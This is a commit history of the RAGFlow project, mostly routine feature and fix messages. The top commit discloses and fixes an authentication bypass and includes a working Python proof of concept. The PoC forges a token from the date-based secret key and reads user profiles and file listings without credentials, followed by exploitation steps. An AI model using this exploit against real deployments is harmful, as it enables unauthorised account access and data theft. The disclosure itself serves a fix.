Commit Graph

60 Commits

Author SHA1 Message Date
de89b84661 Fix: Authentication Bypass via predictable JWT secret and empty token validation (#7998)
### Description

There's a critical authentication bypass vulnerability that allows
remote attackers to gain unauthorized access to user accounts without
any credentials. The vulnerability stems from two security flaws: (1)
the application uses a predictable `SECRET_KEY` that defaults to the
current date, and (2) the authentication mechanism fails to properly
validate empty access tokens left by logged-out users. When combined,
these flaws allow attackers to forge valid JWT tokens and authenticate
as any user who has previously logged out of the system.

The authentication flow relies on JWT tokens signed with a `SECRET_KEY`
that, in default configurations, is set to `str(date.today())` (e.g.,
"2025-05-30"). When users log out, their `access_token` field in the
database is set to an empty string but their account records remain
active. An attacker can exploit this by generating a JWT token that
represents an empty access_token using the predictable daily secret,
effectively bypassing all authentication controls.


### Source - Sink Analysis

**Source (User Input):** HTTP Authorization header containing
attacker-controlled JWT token

**Flow Path:**
1. **Entry Point:** `load_user()` function in `api/apps/__init__.py`
(Line 142)
2. **Token Processing:** JWT token extracted from Authorization header
3. **Secret Key Usage:** Token decoded using predictable SECRET_KEY from
`api/settings.py` (Line 123)
4. **Database Query:** `UserService.query()` called with decoded empty
access_token
5. **Sink:** Authentication succeeds, returning first user with empty
access_token

### Proof of Concept

```python
import requests
from datetime import date
from itsdangerous.url_safe import URLSafeTimedSerializer
import sys

def exploit_ragflow(target):
    # Generate token with predictable key
    daily_key = str(date.today())
    serializer = URLSafeTimedSerializer(secret_key=daily_key)
    malicious_token = serializer.dumps("")
    
    print(f"Target: {target}")
    print(f"Secret key: {daily_key}")
    print(f"Generated token: {malicious_token}\n")
    
    # Test endpoints
    endpoints = [
        ("/v1/user/info", "User profile"),
        ("/v1/file/list?parent_id=&keywords=&page_size=10&page=1", "File listing")
    ]
    
    auth_headers = {"Authorization": malicious_token}
    
    for path, description in endpoints:
        print(f"Testing {description}...")
        response = requests.get(f"{target}{path}", headers=auth_headers)
        
        if response.status_code == 200:
            data = response.json()
            if data.get("code") == 0:
                print(f"SUCCESS {description} accessible")
                if "user" in path:
                    user_data = data.get("data", {})
                    print(f"  Email: {user_data.get('email')}")
                    print(f"  User ID: {user_data.get('id')}")
                elif "file" in path:
                    files = data.get("data", {}).get("files", [])
                    print(f"  Files found: {len(files)}")
            else:
                print(f"Access denied")
        else:
            print(f"HTTP {response.status_code}")
        print()

if __name__ == "__main__":
    target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost"
    exploit_ragflow(target_url)
```

**Exploitation Steps:**
1. Deploy RAGFlow with default configuration
2. Create a user and make at least one user log out (creating empty
access_token in database)
3. Run the PoC script against the target
4. Observe successful authentication and data access without any
credentials


**Version:** 0.19.0
@KevinHuSh @asiroliu @cike8899

Co-authored-by: nkoorty <amalyshau2002@gmail.com>
2025-06-05 12:10:24 +08:00
e166f132b3 Feat: change default models (#7777)
### What problem does this PR solve?

change default models to buildin models
https://github.com/infiniflow/ragflow/issues/7774

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2025-05-23 18:21:25 +08:00
c5826d4720 Feat: launch sandbox from docker-compose (#7671)
### What problem does this PR solve?

Launch sandbox from docker-compose.
#4977
### Type of change

- [x] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update

---------

Co-authored-by: writinwaters <93570324+writinwaters@users.noreply.github.com>
2025-05-16 11:14:57 +08:00
c98933499a refa: Optimize create dataset validation (#7451)
### What problem does this PR solve?

Optimize dataset validation and add function docs

### Type of change

- [x] Refactoring
2025-05-06 17:38:06 +08:00
3a43043c8a Feat: Add support for OAuth2 and OpenID Connect (OIDC) authentication (#7379)
### What problem does this PR solve?

Add support for OAuth2 and OpenID Connect (OIDC) authentication,
allowing OAuth/OIDC authentication using the specified routes:
- `/login/<channel>`: Initiates the OAuth flow for the specified channel
- `/oauth/callback/<channel>`: Handles the OAuth callback after
successful authentication

The callback URL should be configured in your OAuth provider as:
```
https://your-app.com/oauth/callback/<channel>
```

For detailed instructions on configuring **service_conf.yaml.template**,
see: `./api/apps/auth/README.md#usage`.

- Related issues
#3495  

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
2025-04-28 16:15:52 +08:00
c8c3b756b0 Feat: Adds OpenSearch2.19.1 as the vector_database support (#7140)
### What problem does this PR solve?

This PR adds the support for latest OpenSearch2.19.1 as the store engine
& search engine option for RAGFlow.

### Main Benefit

1. OpenSearch2.19.1 is licensed under the [Apache v2.0 License] which is
much better than Elasticsearch
2. For search, OpenSearch2.19.1 supports full-text
search、vector_search、hybrid_search those are similar with Elasticsearch
on schema
3. For store, OpenSearch2.19.1 stores text、vector those are quite
simliar with Elasticsearch on schema

### Changes

- Support opensearch_python_connetor. I make a lot of adaptions since
the schema and api/method between ES and Opensearch differs in many
ways(especially the knn_search has a significant gap) :
rag/utils/opensearch_coon.py
- Support static config adaptions by changing:
conf/service_conf.yaml、api/settings.py、rag/settings.py
- Supprt some store&search schema changes between OpenSearch and ES:
conf/os_mapping.json
- Support OpenSearch python sdk : pyproject.toml
- Support docker config for OpenSearch2.19.1 :
docker/.env、docker/docker-compose-base.yml、docker/service_conf.yaml.template

### How to use
- I didn't change the priority that ES as the default doc/search engine.
Only if in docker/.env , we set DOC_ENGINE=${DOC_ENGINE:-opensearch}, it
will work.


### Others
Our team tested a lot of docs in our environment by using OpenSearch as
the vector database ,it works very well.
All the conifg for OpenSearch is necessary.

### Type of change

- [x] New Feature (non-breaking change which adds functionality)

---------

Co-authored-by: Yongteng Lei <yongtengrey@outlook.com>
Co-authored-by: writinwaters <93570324+writinwaters@users.noreply.github.com>
Co-authored-by: Yingfeng <yingfeng.zhang@gmail.com>
2025-04-24 16:03:31 +08:00
94181a990b Refa: knowledge_graph chunk method is deprecated (#7220)
### What problem does this PR solve?

The knowledge_graph chunk method is deprecated and should no longer be
used. #7184.

### Type of change

- [x] Refactoring
2025-04-23 13:01:46 +08:00
1bb990719e Feat: Add user registration toggle feature (#6327)
### What problem does this PR solve?

Feat: Add user registration toggle feature. Added a user registration
toggle REGISTER_ENABLED in the settings and .env config file. The user
creation interface now checks the state of this toggle to control the
enabling and disabling of the user registration feature.

the front-end implementation is done, the registration button does not
appear if registration is not allowed. I did the actual tests on my
local server and it worked smoothly.
### Type of change

- [x] New Feature (non-breaking change which adds functionality)

---------

Co-authored-by: wenju.li <wenju.li@deepctr.cn>
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
2025-03-21 09:38:15 +08:00
2d4a60cae6 Fix: Reduce excessive IO operations by loading LLM factory configurations (#6047)
…ions

### What problem does this PR solve?

This PR fixes an issue where the application was repeatedly reading the
llm_factories.json file from disk in multiple places, which could lead
to "Too many open files" errors under high load conditions. The fix
centralizes the file reading operation in the settings.py module and
stores the data in a global variable that can be accessed by other
modules.

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [x] Performance Improvement
- [ ] Other (please describe):
2025-03-14 09:54:38 +08:00
a0b461a18e Add configuration to choose default llm models (#5245)
### What problem does this PR solve?

This pull request includes changes to the `api/settings.py` and
`docker/service_conf.yaml.template` files to add support for default
models in the LLM configuration (specially for LIGHTEN builds). The most
important changes include adding default model configurations and
updating the initialization settings to use these defaults.

For example:
With this configuration Bedrock will be enable by default with claude
and titan embeddings.

```
user_default_llm:
  factory: 'Bedrock'
  api_key: '{}' 
  base_url: ''
  default_models:
    chat_model: 'anthropic.claude-3-5-sonnet-20240620-v1:0'
    embedding_model: 'amazon.titan-embed-text-v2:0'
    rerank_model: ''
    asr_model: ''
    image2text_model: ''
```


### Type of change

- [X] New Feature (non-breaking change which adds functionality)

---------

Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
2025-02-24 10:13:39 +08:00
c5da3cdd97 Tagging (#4426)
### What problem does this PR solve?

#4367

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2025-01-09 17:07:21 +08:00
7d4f1c0645 Case insensitive when set doc engine (#3954)
### What problem does this PR solve?

DOC_ENGINE="INFINITY" or "Infinity" or "Elasticsearch" also works

### Type of change

- [x] Refactoring

Signed-off-by: Jin Hai <haijin.chn@gmail.com>
2024-12-10 11:26:10 +08:00
d9c882399d Ensure LIGHTEN work (#3542)
### What problem does this PR solve?
#3531

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-11-21 09:56:28 +08:00
70cd5c1599 Remove unused code (#3448)
### What problem does this PR solve?

1. Remove unused code.
2. Move some codes from settings to constants

### Type of change

- [x] Refactoring

---------

Signed-off-by: jinhai <haijin.chn@gmail.com>
2024-11-18 12:05:38 +08:00
1e90a1bf36 Move settings initialization after module init phase (#3438)
### What problem does this PR solve?

1. Module init won't connect database any more.
2. Config in settings need to be used with settings.CONFIG_NAME

### Type of change

- [x] Refactoring

Signed-off-by: jinhai <haijin.chn@gmail.com>
2024-11-15 17:30:56 +08:00
47abfc32d4 Remove unused settings (#3427)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Refactoring

Signed-off-by: jinhai <haijin.chn@gmail.com>
2024-11-15 13:18:16 +08:00
9d395ab74e Added doc for switching elasticsearch to infinity (#3370)
### What problem does this PR solve?

Added doc for switching elasticsearch to infinity

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
2024-11-14 00:08:55 +08:00
ccf189cb7f mv service_conf.yaml to conf/ and fix: add 'answer' as a parameter to 'generate' (#3379)
### What problem does this PR solve?
#3373

### Type of change

- [x] Refactoring
- [x] Bug fix
2024-11-13 15:56:40 +08:00
a2a5631da4 Rework logging (#3358)
Unified all log files into one.

### What problem does this PR solve?

Unified all log files into one.

### Type of change

- [x] Refactoring
2024-11-12 17:35:13 +08:00
f4c52371ab Integration with Infinity (#2894)
### What problem does this PR solve?

Integration with Infinity

- Replaced ELASTICSEARCH with dataStoreConn
- Renamed deleteByQuery with delete
- Renamed bulk to upsertBulk
- getHighlight, getAggregation
- Fix KGSearch.search
- Moved Dealer.sql_retrieval to es_conn.py


### Type of change

- [x] Refactoring
2024-11-12 14:59:41 +08:00
cbca7dfce6 fix bugs in test (#3196)
### What problem does this PR solve?

fix bugs in test

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)

---------

Co-authored-by: liuhua <10215101452@stu.ecun.edu.cn>
2024-11-04 20:03:14 +08:00
07c453500b set default LLM to new registered user (#3180)
### What problem does this PR solve?


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-11-04 15:03:07 +08:00
c760f058df add owner check for team work (#2892)
### What problem does this PR solve?

#2834

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-10-18 13:48:57 +08:00
e1e5711680 Feat:Compatible with Dify's External Knowledge API (#2848)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
Fixes #2731 
### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-10-15 17:47:24 +08:00
2d1c83da59 fix LIGHTEN issue (#2806)
### What problem does this PR solve?


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-10-11 15:01:27 +08:00
5cc9981a4d Fix LIGHTEN. Close #2723 (#2744)
### What problem does this PR solve?

Fix LIGHTEN
#2726 
#2723

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):

---------

Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
2024-10-08 15:58:14 +08:00
1de3032650 fix AzureOpenAI issue` (#2608)
### What problem does this PR solve?

#1599

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-09-26 17:25:16 +08:00
7bb28ca2bd add lighten control (#2567)
### What problem does this PR solve?

#2295

### Type of change

- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
2024-09-24 19:22:01 +08:00
f8e9a0590f Common: Support postgreSQL database as the metadata db. (#2357)
https://github.com/infiniflow/ragflow/issues/2356

### What problem does this PR solve?

As title

### Type of change

- [X] New Feature (non-breaking change which adds functionality)
2024-09-12 15:12:39 +08:00
6b3a40be5c Format file format from Windows/dos to Unix (#1949)
### What problem does this PR solve?

Related source file is in Windows/DOS format, they are format to Unix
format.

### Type of change

- [x] Refactoring

Signed-off-by: Jin Hai <haijin.chn@gmail.com>
2024-08-15 09:17:36 +08:00
ede733e130 add support for eml file parser (#1768)
### What problem does this PR solve?

add support for eml file parser
#1363

### Type of change

- [x] New Feature (non-breaking change which adds functionality)

---------

Co-authored-by: Zhedong Cen <cenzhedong2@126.com>
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
2024-08-06 16:42:14 +08:00
152072f900 Add graphrag (#1793)
### What problem does this PR solve?

#1594

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-08-02 18:51:14 +08:00
H
ac7a0d4fbf Add ParsertType Audio (#1637)
### What problem does this PR solve?

#1514 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-22 19:17:30 +08:00
a6765e9ca4 Integrates LLM Azure OpenAI (#1318)
### What problem does this PR solve?

feat: Integrates LLM Azure OpenAI #716 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)

### Other
It's just the back-end code, the front-end needs to provide the Azure
OpenAI model addition form.
   
#### Required parameters

- base_url
- api_key

---------

Co-authored-by: yonghui li <yonghui.li@bondex.com.cn>
2024-07-04 09:57:16 +08:00
cf2f6592dd API: create dataset (#1106)
### What problem does this PR solve?

This PR have finished 'create dataset' of both HTTP API and Python SDK.
HTTP API:
```
curl --request POST --url http://<HOST_ADDRESS>/api/v1/dataset   --header 'Content-Type: application/json' --header 'Authorization: <ACCESS_KEY>' --data-binary '{
  "name": "<DATASET_NAME>"
}'
```

Python SDK:
```
from ragflow.ragflow import RAGFLow
ragflow = RAGFLow('<ACCESS_KEY>', 'http://127.0.0.1:9380')
ragflow.create_dataset("dataset1")

```

TODO: 
- ACCESS_KEY is the login_token when user login RAGFlow, currently.
RAGFlow should have the function that user can add/delete access_key.

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update

---------

Signed-off-by: Jin Hai <haijin.chn@gmail.com>
2024-06-11 11:16:37 +08:00
614defec21 add rerank model (#969)
### What problem does this PR solve?

feat: add rerank models to the project #724 #162

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-29 16:50:02 +08:00
2dd705fe68 feat: add feishu oauth (#815)
### What problem does this PR solve?

The back-end code adds Feishu oauth

### Type of change

- [x] New Feature (non-breaking change which adds functionality)

Co-authored-by: yonghui li <yonghui.li@bondex.com.cn>
2024-05-17 13:47:05 +08:00
aa1c915d6e support gpt-4o (#773)
### What problem does this PR solve?
#771 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-15 11:16:08 +08:00
9d60a84958 refactor code (#583)
### What problem does this PR solve?

### Type of change

- [x] Refactoring
2024-04-28 13:19:54 +08:00
f6c7204002 refine log format (#312)
### What problem does this PR solve?

Issue link:#264
### Type of change


- [x] Documentation Update
- [x] Refactoring
2024-04-11 10:13:43 +08:00
e1e693ec36 set database logger level (#270)
### What problem does this PR solve?

Issue link:#264

### Type of change

- [x] Performance Improvement
2024-04-09 09:47:02 +08:00
23b448cf96 fix docker compose issue (#238)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

Issue link:#[[Link the issue
here](https://github.com/infiniflow/ragflow/issues/226)]

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-04-07 09:04:32 +08:00
fd7fcb5baf apply pep8 formalize (#155) 2024-03-27 11:33:46 +08:00
f6aee7f230 add use layout or not option (#145)
* add use layout or not option

* trival
2024-03-22 19:21:09 +08:00
5875c8ba08 Add 'One' chunk method (#137) 2024-03-20 18:57:22 +08:00
9da671b951 refine manul parser (#131) 2024-03-19 12:26:04 +08:00
675a9f8d9a add dockerfile for cuda envirement. Refine table search strategy, (#123) 2024-03-14 19:45:29 +08:00
f1f09df901 add local llm implementation (#119) 2024-03-12 11:57:08 +08:00
685b4d8a95 fix table desc bugs, add positions to chunks (#91) 2024-03-04 14:42:26 +08:00
8a726fb04b solve task execution issues (#90) 2024-03-01 19:48:01 +08:00